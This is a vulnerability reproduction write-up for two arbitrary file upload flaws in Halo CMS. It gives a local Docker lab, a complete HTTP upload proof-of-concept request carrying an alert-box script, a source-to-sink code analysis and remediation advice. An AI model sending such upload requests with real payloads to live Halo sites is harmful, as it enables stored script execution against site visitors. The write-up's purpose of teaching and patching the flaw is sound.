[Vulnerability Reproduction] CVE-2022-26619 / CVE-2022-32994 Arbitrary File Upload
Vulnerability Information
NVD - CVE-2022-26619
Halo Blog CMS v1.4.17 was discovered to allow attackers to upload arbitrary files via the Attachment Upload function.
NVD - CVE-2022-32994
Halo CMS v1.5.3 was discovered to contain an arbitrary file upload vulnerability via the component /api/admin/attachments/upload.
Background
Halo is an open-source, self-hosted blog platform built with Java. It is designed to be simple, fast, and flexible, allowing users to create and manage blogs with ease. Halo offers a clean and modern user interface, supports Markdown for writing posts, and provides various customization options such as themes and plugins.
• Homepage: https://www.halo.run/
• Source code: https://github.com/halo-dev/halo
Environment Setup
$ docker pull swimminghao/halo:1.5.3
$ docker run -d -p 8090:8090 swimminghao/halo:1.5.3
The first visit to http://127.0.0.1:8090/ redirects straight to the installation wizard; follow the prompts to complete the installation:
Web UI: http://127.0.0.1:8090/admin/index.html#/login
Credentials: admin / 88888888
Vulnerability Reproduction
This is a file upload vulnerability, so first prepare the file to upload:
$ touch hacked.jsp
$ echo "<script>alert(\"You are hacked\!\")</script>" > hacked.jsp
This is a plain HTML/JS snippet saved with a .jsp name; when the stored file is opened in a browser, the alert box shows whether the server hands it back in a way the browser renders and executes:
The two CVEs are essentially the same bug; only the front-end entry point used to reach the upload differs:
CVE-2022-26619: Attachments → Upload, upload an attachment
CVE-2022-32994: Appearance → Theme settings → Style settings, upload a file
The captured request is shown below; once it is sent, the response echoes back the storage PATH of the file:
POC:
POST /api/admin/attachments/upload HTTP/1.1
Host: 127.0.0.1:8090
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Admin-Authorization: 8fb5b0e9619e4f1b87202985e6916c6b
Content-Type: multipart/form-data; boundary=---------------------------173360575825736325452909371224
Content-Length: 279
Origin: http://127.0.0.1:8090
Connection: keep-alive
Referer: http://127.0.0.1:8090/admin/index.html
Cookie: JSESSIONID=node01ntfyvfpqwkqs1hd6cxvgk8qmy1.node0

-----------------------------173360575825736325452909371224
Content-Disposition: form-data; name="file"; filename="hacked.jsp"
Content-Type: application/octet-stream

<script>alert("You are hacked\!")</script>
-----------------------------173360575825736325452909371224--
The file is reachable at the echoed PATH, and because the server serves it back as-is, the browser renders it and the JavaScript runs (stored script execution on the blog's own origin):
Vulnerability Analysis
The source is run.halo.app.controller.admin.api.AttachmentController#uploadAttachment, reached via the POST request above:
The sink is run.halo.app.service.impl.AttachmentServiceImpl#create:
Between source and sink the tainted file passes through only a single Assert.notNull check, in run.halo.app.service.impl.AttachmentServiceImpl#upload, which merely confirms the file object is present; the filename, extension, declared content type and actual content are never validated:
Remediation
Validate the uploaded Attachment thoroughly before it reaches AttachmentServiceImpl#create: allow-list the file extension and confirm the file's content matches it, normalise the filename and reject any path separators, and serve stored attachments with a non-executable content type plus Content-Disposition: attachment so a browser never renders uploaded HTML or script.